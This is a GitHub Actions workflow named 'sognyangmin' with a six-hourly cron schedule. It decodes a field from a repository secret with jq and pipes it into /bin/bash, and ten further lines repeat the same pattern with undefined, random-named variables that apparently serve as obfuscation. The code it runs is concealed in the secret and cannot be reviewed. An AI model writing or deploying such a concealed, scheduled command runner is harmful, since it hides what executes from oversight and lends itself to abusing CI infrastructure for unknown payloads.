name: sognyangmin
on:
  workflow_dispatch:
  schedule:
    - cron: '50 4/6 * * *'
jobs:  # 26679
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: sognyangmin
        env:
          h2: ${{ secrets.h2 }}
        run: |
          echo $h2 | jq -r .m11082 | /bin/bash
          echo $vdjg2216 | jq -r .bjwzf2776 | /bin/bash
          echo $cq4 | jq -r .emcr1 | /bin/bash
          echo $ep09 | jq -r .zuz5907 | /bin/bash
          echo $hvgb85 | jq -r .t035 | /bin/bash
          echo $l921 | jq -r .ypkcf29662 | /bin/bash
          echo $gcxy000 | jq -r .lfx3582 | /bin/bash
          echo $xkmf115 | jq -r .twyr1 | /bin/bash
          echo $ig99 | jq -r .i6680 | /bin/bash
          echo $wd1 | jq -r .uvzh61 | /bin/bash
          echo $gngb6 | jq -r .rl6604 | /bin/bash

